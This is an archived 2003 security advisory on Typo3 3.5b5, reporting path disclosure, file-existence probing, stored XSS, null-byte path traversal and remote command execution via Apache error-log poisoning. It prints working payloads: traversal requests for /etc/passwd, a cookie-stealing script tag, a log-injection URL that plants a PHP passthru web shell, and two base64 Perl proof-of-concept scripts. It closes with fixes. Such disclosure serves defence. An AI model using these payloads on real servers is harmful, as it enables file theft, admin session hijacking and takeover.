1st Mar 2003 [SBWID-6033]
COMMAND
	Typo3 remote file disclosure, command execution ...
SYSTEMS AFFECTED
	 Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)
	 Tested Plattforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2
PROBLEM
	In Martin Eiszner [[email protected]] advisory :
	
	 http://www.websec.org/adv/typo3.html
	
	TYPO3 is a free Open Source content  management  system  for  enterprise
	purposes on the web and in intranets. It  offers  full  flexibility  and
	extendability  while  featuring  an  accomplished  set   of   ready-made
	interfaces, functions and modules.
	
	0) CLIENT-SIDE DATA-OBFUSCATION
	
	form-fields  are  obfuscated  using  client-side  java-script  routines.
	after the  fields  are  joined  a  java-script  creates  MD5-hashes  and
	submits the form.
	examples: index.php (account-data), showpic.php(name-checksum)
	attached   perl-scripts   (typo.pl/showpic.pl)   demonstrate   how    to
	circumvent this protection.
	
	1) PATH-DISCLOSURE
	
	several test-, class- and library-scripts can be found  within  webroot.
	some of them can be forced to produce runtime errors  and  output  their
	physical path.
	example: /fileadmin/include_test.php
	
	2) PROOF OF FILE-EXISTENCE
	
	"showpic.php" and "thumbs.php" allow an attacker to check the  existense
	of arbitrary files.
	combined with file-enumeration methods it  is  possible  to  reconstruct
	parts of the directory- and filesystem - structure.
	example on howto check for  existing  files  with  attached  perl-script
	"showpic.pl":
	
	---*---
	sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
	../../../../../../../../../../etc/hosts exists
	---*---
	
	
	3) CROSS SITE SCRIPTING / COOKIE-THEFT
	
	all  system  and  login-errors  are   saved   in   the   typo3-database.
	administrators can view all the erroneous data.
	since this data is not being checked for XSS-content it is  possible  to
	include client-side script(java-script)-tags in these entries.
	every time the admins view their logs these scripts will be run  on  the
	admins web-browser which leads to a typical XSS-bug.
	thus making it possible to steal the admins-cookies or let  him  open  a
	new user-account without his knowledge.
	example with the attached "typo.pl" - perlscript:
	
	---*---
	sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
	---*---
	
	viewing the logfiles will execute the script.
	
	4) ARBITRARY FILE-RETRIEVAL
	
	the "dev/translations.php" - script does not  check  the  ONLY-parameter
	for malicious values.
	a relative path combined with a Nullbyte lead to the  inclusion  of  the
	given file.
	example http-request:
	
	---*---
	GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
	---*---
	
	
	5) ARBITRARY COMMAND EXECUTION
	
	extends vulnerability number 4):
	if the included file contains php-source code it will be executed.  thus
	allowing an attacker to execute operating-system commands  and  at  long
	sight escalate his privileges.
	example:
	a file for placing our malicious php-source is needed. if  there  is  no
	file we have write-access we still can use the websevers-logfiles.
	the following http-request:
	
	---cut---
	http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
	---cut---
	
	creates this entry:
	
	---cut---
	[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c
	)?>' >> ./x.php` ?>
	---cut---
	
	in a typicall apache - error_log file.
	using the method discussed under 4) the following http-request:
	
	---cut---
	http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
	---cut---
	
	will  include  the  apach  error_log  in  our  output  and  execute  our
	php-commands. as a result we will find x.php in our "/dev" directory.
	x.php:
	
	---cut---
	<?passthru($c)?>
	---cut---
	
	
	6) SCRIPTS AND DIRECTORIES IN WEBROOT
	
	a couple of scripts, libraries,  files  and  directories  can  be  found
	within typo3s webroot.
	
	"/install" is improper protected and vulnerable to brute-force attacks.
	"/fileadmin" directory reveals log-files and demo-scripts
	"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files
	
	 Remarks
	 =======
	the  serious  vulnerabilities  rely  on  the   "/dev"   (developer?)   -
	directory. scripts within this  directory  can  be  found  in  many/most
	production-environments!
	
	--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
	Content-Type: application/octet-stream;
	 name="typo.pl"
	Content-Disposition: attachment;
	 filename="typo.pl"
	Content-Transfer-Encoding: base64
	IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSBHZXRvcHQ6OlN0ZDsKdXNlIExXUDo6VXNl
	ckFnZW50Owp1c2UgSFRUUDo6UmVxdWVzdDsKdXNlIEhUVFA6OlJlc3BvbnNlOwp1c2UgSFRUUDo6
	SGVhZGVyczsKdXNlIEhUTUw6OkZvcm07CnVzZSBEaWdlc3Q6Ok1ENSBxdyhtZDVfaGV4KTsKCm15
	ICgkdGhlaG9zdCwkYWNjb3VudCkgPSBAQVJHVjsKbXkgKCR1aWQsJHB3ZCkgPSBzcGxpdCgvOi8s
	JGFjY291bnQsMik7Cm15ICRwYXNzID0gJHB3ZDsKcHJpbnQgIlxuY2hlY2tpbmcgJHRoZWhvc3Qg
	fCAkdWlkIHwgJHB3ZFxuIjsKJHB3ZCA9IG1kNV9oZXgoIiRwd2QiKTsKCm15ICRjb250ZW50ID0g
	IiI7Cm15ICR1c2VyaWRlbnQgPSAiIjsKCm15ICRoZHMgPSBIVFRQOjpIZWFkZXJzLT5uZXc7Cm15
	ICR1YSA9IG5ldyBMV1A6OlVzZXJBZ2VudCgpOwpwdXNoIEB7ICR1YS0+cmVxdWVzdHNfcmVkaXJl
	Y3RhYmxlIH0sICdQT1NUJzsKJHVhLT5hZ2VudCgiT3BlcmEgNi4wIik7CgpteSAkdXJpID0gImh0
	dHA6Ly8iLiR0aGVob3N0LiIvdHlwbzMvdHlwbzMvaW5kZXgucGhwIjsKbXkgJHJlcSA9IEhUVFA6
	OlJlcXVlc3QtPm5ldygiR0VUIiwgJHVyaSwgJGhkcywgJGNvbnRlbnQpOwpteSAkcmVzID0gJHVh
	LT5yZXF1ZXN0KCRyZXEpOwpteSAkcmVzX2hlYWRzID0gJHJlcy0+aGVhZGVyczsKCm15ICRjb29r
	aWUgPSAkcmVzX2hlYWRzLT5oZWFkZXIoIlNldC1Db29raWUiKTsKbXkgJGZvcm0gPSBIVE1MOjpG
	b3JtLT5wYXJzZSgkcmVzLT5jb250ZW50LCAiJHVyaSIpOwpteSAkY2hhbGxlbmdlID0gJGZvcm0t
	PnZhbHVlKCJjaGFsbGVuZ2UiKTsKJHVzZXJpZGVudCA9IG1kNV9oZXgoIiR1aWQ6JHB3ZDokY2hh
	bGxlbmdlIik7CgokaGRzLT5oZWFkZXIoJ0Nvb2tpZScgPT4gIiRjb29raWUiKTsKJGhkcy0+aGVh
	ZGVyKCdDb250ZW50LVR5cGUnID0+ICAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk
	Iik7CiRjb250ZW50ID0gICJ1c2VybmFtZT0kdWlkJnBfZmllbGQ9JnVzZXJpZGVudD0kdXNlcmlk
	ZW50JmNoYWxsZW5nZT0kY2hhbGxlbmdlJnJlZGlyZWN0X3VybD1hbHRfbWFpbi5waHAiOwokY29u
	dGVudCAuPSAiJmxvZ2luUmVmcmVzaD0mbG9naW5fc3RhdHVzPWxvZ2luJmludGVyZmFjZT1hbHRl
	cm5hdGl2ZSI7CgpteSAkcmVxID0gSFRUUDo6UmVxdWVzdC0+bmV3KCJQT1NUIiwgJHVyaSwgJGhk
	cywgJGNvbnRlbnQpOwpteSAkcmVzID0gJHVhLT5yZXF1ZXN0KCRyZXEpOwoKJHJlc19oZWFkcyA9
	ICRyZXMtPmhlYWRlcnM7CiRjb29raWUgPSAkcmVzX2hlYWRzLT5oZWFkZXIoIlNldC1Db29raWUi
	KTsKCnByaW50ICJcblJlc2NvZGU6Ii4kcmVzLT5jb2RlKCkuIlxuIi4kcmVzX2hlYWRzLT5hc19z
	dHJpbmcoKS4iXG5cbiI7CiNwcmludCAiXG4iLiRyZXNfaGVhZHMtPmFzX3N0cmluZygpLiJcblxu
	Ii4kcmVzLT5jb250ZW50KCkuIlxuXG4iOwo=
	
	
	--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
	Content-Type: application/octet-stream;
	 name="showpic.pl"
	Content-Disposition: attachment;
	 filename="showpic.pl"
	Content-Transfer-Encoding: base64
	IyEvdXNyL2Jpbi9wZXJsCnVzZSBMV1A6OlVzZXJBZ2VudDsKdXNlIEhUVFA6OlJlcXVlc3Q7CnVz
	ZSBIVFRQOjpSZXNwb25zZTsKdXNlIERpZ2VzdDo6TUQ1IHF3KG1kNV9oZXgpOwooJGhvLCRmaSkg
	PSBAQVJHVjsKJG1kNSA9IG1kNV9oZXgoIiRmaXx8fHwiKTsKJHVhID0gbmV3IExXUDo6VXNlckFn
	ZW50KCk7ICR1YS0+YWdlbnQoIk9wZXJhIDYuMCIpOwokdXJpID0gImh0dHA6Ly8iLiRoby4iL3R5
	cG8zL3Nob3dwaWMucGhwP2ZpbGU9JGZpJm1kNT0kbWQ1IjsKJHJlcSA9IEhUVFA6OlJlcXVlc3Qt
	Pm5ldygiR0VUIiwkdXJpKTsKJHJlcyA9ICR1YS0+cmVxdWVzdCgkcmVxKTsKaWYgKCRyZXMtPmNv
	bnRlbnQgIX4gL3dhcyBub3QgZm91bmQvICYmICRyZXMtPmNvbnRlbnQgIX4gL05vIHZhbGlkLykg
	e3ByaW50ICJcbiRmaSBleGlzdHNcbiI7fQplbHNlIHtwcmludCAiXG4kZmkgbm90IGZvdW5kXG4i
	O30K
	--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0--
	
SOLUTION
	Install the new Version : http://typo3.org/1331.0.html
	or
	 1) remove "/install" directory
	 2) remove "/dev" directory
	 3) Choose strong administrator-passwords
	 4) showpic.php and thumbs.php must be patched.
	 5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"